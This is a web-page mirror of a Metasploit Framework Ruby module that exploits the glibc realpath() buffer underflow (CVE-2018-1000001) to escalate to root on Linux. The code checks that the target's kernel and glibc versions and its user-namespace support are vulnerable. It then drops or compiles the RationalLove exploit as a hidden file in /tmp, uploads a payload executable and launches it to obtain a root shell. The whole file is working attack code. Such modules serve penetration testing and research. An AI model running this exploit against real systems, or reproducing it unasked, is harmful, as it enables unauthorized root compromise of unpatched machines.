Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/glibc_realpath_priv_esc.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = NormalRanking
8
9
include Msf::Post::File
10
include Msf::Post::Linux::Priv
11
include Msf::Post::Linux::System
12
include Msf::Post::Linux::Kernel
13
include Msf::Exploit::EXE
14
include Msf::Exploit::FileDropper
15
prepend Msf::Exploit::Remote::AutoCheck
16
17
def initialize(info = {})
18
super(
19
update_info(
20
info,
21
'Name' => "glibc 'realpath()' Privilege Escalation",
22
'Description' => %q{
23
This module attempts to gain root privileges on Linux systems by abusing
24
a vulnerability in GNU C Library (glibc) version 2.26 and prior.
25
26
This module uses halfdog's RationalLove exploit to exploit a buffer
27
underflow in glibc realpath() and create a SUID root shell. The exploit
28
has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.
29
30
The target system must have unprivileged user namespaces enabled.
31
32
This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)
33
with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc
34
version 2.24-11+deb9u1.
35
},
36
'License' => MSF_LICENSE,
37
'Author' => [
38
'halfdog', # Discovery and RationalLove.c exploit
39
'bcoles' # Metasploit
40
],
41
'DisclosureDate' => '2018-01-16',
42
'Platform' => [ 'linux' ],
43
'Arch' => [ ARCH_X86, ARCH_X64 ],
44
'SessionTypes' => [ 'shell', 'meterpreter' ],
45
'Targets' => [[ 'Auto', {} ]],
46
'Privileged' => true,
47
'References' => [
48
[ 'BID', '102525' ],
49
[ 'CVE', '2018-1000001' ],
50
[ 'EDB', '43775' ],
51
[ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],
52
[ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],
53
[ 'URL', 'https://securitytracker.com/id/1040162' ],
54
[ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],
55
[ 'URL', 'https://usn.ubuntu.com/3534-1/' ],
56
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]
57
],
58
'DefaultTarget' => 0,
59
'Notes' => {
60
'AKA' => ['RationalLove.c'],
61
'Stability' => UNKNOWN_STABILITY,
62
'Reliability' => UNKNOWN_RELIABILITY,
63
'SideEffects' => UNKNOWN_SIDE_EFFECTS
64
},
65
'Compat' => {
66
'Meterpreter' => {
67
'Commands' => %w[
68
stdapi_fs_delete_file
69
]
70
}
71
}
72
)
73
)
74
register_options [
75
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])
76
]
77
register_advanced_options [
78
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
79
]
80
end
81
82
def base_dir
83
datastore['WritableDir'].to_s
84
end
85
86
def upload(path, data)
87
print_status "Writing '#{path}' (#{data.size} bytes) ..."
88
write_file path, data
89
register_file_for_cleanup path
90
end
91
92
def upload_and_chmodx(path, data)
93
upload path, data
94
cmd_exec "chmod +x '#{path}'"
95
end
96
97
def upload_and_compile(path, data)
98
upload "#{path}.c", data
99
100
gcc_cmd = "gcc -w -o #{path} #{path}.c"
101
if session.type.eql? 'shell'
102
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
103
end
104
output = cmd_exec gcc_cmd
105
106
unless output.blank?
107
print_error output
108
fail_with Failure::Unknown, "#{path}.c failed to compile"
109
end
110
111
register_file_for_cleanup path
112
cmd_exec "chmod +x #{path}"
113
end
114
115
def strip_comments(c_code)
116
c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
117
end
118
119
def exploit_data(file)
120
::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)
121
end
122
123
def live_compile?
124
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
125
126
if has_gcc?
127
vprint_good 'gcc is installed'
128
return true
129
end
130
131
unless datastore['COMPILE'].eql? 'Auto'
132
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
133
end
134
end
135
136
def check
137
version = kernel_release
138
if Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.36')
139
vprint_error "Linux kernel version #{version} is not vulnerable"
140
return CheckCode::Safe
141
end
142
vprint_good "Linux kernel version #{version} is vulnerable"
143
144
arch = kernel_hardware
145
unless arch.include? 'x86_64'
146
vprint_error "System architecture #{arch} is not supported"
147
return CheckCode::Safe
148
end
149
vprint_good "System architecture #{arch} is supported"
150
151
version = glibc_version
152
if Rex::Version.new(version.split('-').first) > Rex::Version.new('2.26')
153
vprint_error "GNU C Library version #{version} is not vulnerable"
154
return CheckCode::Safe
155
end
156
vprint_good "GNU C Library version #{version} is vulnerable"
157
158
# fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1
159
glibc_banner = cmd_exec('ldd --version')
160
unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')
161
vprint_error 'No offsets for this version of GNU C Library'
162
return CheckCode::Safe
163
end
164
165
config = kernel_config
166
if config.nil?
167
vprint_error 'Could not retrieve kernel config'
168
return CheckCode::Unknown
169
end
170
171
unless config.include? 'CONFIG_USER_NS=y'
172
vprint_error 'Kernel config does not include CONFIG_USER_NS'
173
return CheckCode::Safe
174
end
175
vprint_good 'Kernel config has CONFIG_USER_NS enabled'
176
177
unless userns_enabled?
178
vprint_error 'Unprivileged user namespaces are not permitted'
179
return CheckCode::Safe
180
end
181
vprint_good 'Unprivileged user namespaces are permitted'
182
183
CheckCode::Appears
184
end
185
186
def exploit
187
if !datastore['ForceExploit'] && is_root?
188
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
189
end
190
191
unless writable? base_dir
192
fail_with Failure::BadConfig, "#{base_dir} is not writable"
193
end
194
195
unless writable? base_dir
196
fail_with Failure::BadConfig, "#{base_dir} is not writable"
197
end
198
199
# Upload exploit executable
200
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
201
@executable_path = "#{base_dir}/#{executable_name}"
202
if live_compile?
203
vprint_status 'Live compiling exploit on system...'
204
upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c'))
205
else
206
vprint_status 'Dropping pre-compiled exploit on system...'
207
upload_and_chmodx @executable_path, exploit_data('RationalLove')
208
end
209
210
# Upload payload executable
211
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
212
upload_and_chmodx payload_path, generate_payload_exe
213
214
# Launch exploit
215
print_status 'Launching exploit...'
216
output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30
217
output.each_line { |line| vprint_status line.chomp }
218
end
219
220
def on_new_session(client)
221
# remove root owned SUID executable
222
if client.type.eql? 'meterpreter'
223
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
224
client.fs.file.rm @executable_path
225
else
226
client.shell_command_token "rm #{@executable_path}"
227
end
228
end
229
end
230
231